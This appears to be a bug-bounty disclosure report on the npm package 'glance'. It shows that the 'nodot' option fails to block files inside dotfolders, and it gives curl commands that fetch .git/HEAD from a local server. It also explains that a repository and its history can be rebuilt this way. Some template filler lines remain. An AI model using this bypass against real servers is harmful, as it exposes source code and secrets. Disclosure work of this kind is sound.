I would like to report sensitive information disclosure in
Similar to #486933 in ways
module name: glance
a quick disposable http server for static files
weekly downloads 41
glance modules allows directory browsing and to serve static files through the browser.
The config option
nodot can be used to prevent serving sensitive folders such as
This rule can be bypassed using the technique below which can lead to sensitive information disclosure (An interesting example: https://smitka.me/).
$ npm install -g glance
Inside a project directory, initialise
$ git init
Add rule to ignore dotfiles in
glance in current directory.
$ glance --verbose
glance serving /project/directory on port 8080
Now, current directory will be served by serve with the exception of folder
.git and file
If we try to curl .
.gitignore we get a Not Found error
$ curl --path-as-is 127.0.0.1:8080/.git
<title>File Not Found</title>
Although if we try to fetch files/folders inside a forbidden [dot]folder there is no problem at all and most of it's content can be extracted successfully (except dotfiles itself).
$ curl --path-as-is 127.0.0.1:8080/.git/HEAD
>The structure of git repository is well known, so it is possible to found references to the objects/packs in the repository, download them via direct requests and reconstruct the repository and obtain your files – not only the current ones, but also the past files.
> Select Y or N for the following statements:
>Hunter's comments and funny memes goes here
The essentially bypasses the
nodot feature and allows an attacker to read from a directory that the victim has not allowed access to.
References: - https://github.com/jarofghosts/glance#command-line-options - https://smitka.me/